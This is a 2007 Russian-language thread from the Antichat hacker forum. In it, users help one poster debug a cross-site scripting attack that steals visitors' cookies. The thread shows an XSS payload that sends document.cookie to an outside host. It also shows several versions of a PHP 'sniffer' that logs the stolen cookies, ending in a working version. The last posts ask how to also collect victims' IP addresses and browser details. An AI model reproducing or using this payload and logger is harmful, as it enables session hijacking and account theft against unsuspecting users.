Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Нужна помощь. Видать в запросе... (https://forum.antichat.xyz/showthread.php?t=34664)

int15 04.03.2007 15:37

Нужна помощь. Видать в запросе...
 
Народ, помогайте, запарился чета)
Вот вобщем, нашёл место куда сувать XSS.
Кидаю вот что:
PHP код:

<script&qtdocument.location.href="http://www.humora.net.ru/Files/sniff.php"document.cookie; </script&qt

Где sniff.php содержит такие строки:
PHP код:

<?
 $f 
fopen("snif.txt""a");
 
fwrite($f$REQUEST_URI);
 
fclose($f);
 print(
"OK");
?&
qt;

И в итоге, чтобы записать мои куки, снифером, в snif.txt, меня перебрасывает на страницу:
http://www.humora.net.ru/Files/sniff.phpASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBA IEAD
где
ASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBAIEAD - это и есть document.cookie :)
Подскажите че нетак, плиз, а то не знаю уже че за фигня

o3,14um 04.03.2007 16:53

у тя он записывает тока урл. Всё дело в сниффере. Ты пишешь:
http://www.humora.net.ru/Files/sniff.php+ document.cookie
И переходит на урл+куки.

TaNkist 04.03.2007 17:01

Просто добавь знак вопроса:
http://www.humora.net.ru/Files/sniff.php?
В снифере замени $REQUEST_URI на "$QUERY_STRING \n"

GreenBear 04.03.2007 17:15

$_server['query_string']; лучше :)

int15 04.03.2007 17:32

Cпасибо :) Чето я и правду запарился) Щас буду пробовать :)

int15 04.03.2007 17:38

Хм.. Все сделал, поставил "?" теперь это выглядит так:
===
Parse error: syntax error, unexpected '?' in /var/www/user***/html/humora.net.ru/Files/sniff.php on line 6
===
тут код снифера:
===
<?
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?&qt;
===
туплю чето опять :)

int15 04.03.2007 17:42

аа все, уже не глючит :), новый код:
===
<?php
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?>
===

GreenBear 04.03.2007 17:42

PHP код:

<?php
if($_SERVER['QUERY_STRING']){
    
$f fopen("log""a");
    
fwrite($f$_SERVER['QUERY_STRING']."\n\n");
    
fclose($f);
}
?>


int15 04.03.2007 18:24

а может вы мне поможете к этому сниферу какие нибудь фишки прикрутить :)
ну там чтобы он какую нибудь инфу о компе собирал, какой нето Ip-адрес, браузер или еще чего-нибудь по удобней :) ?

o3,14um 08.03.2007 14:47

тебе нужно тока версия браузера, урл и ип. Ничё лишнего. Ну можешь ещё сделать, чтоб одинаковые записи удалялись;) В иненте полно пхп-снифферов, даже на этом сайте есть выложенный где-то... Поиском пройдись


Время: 22:42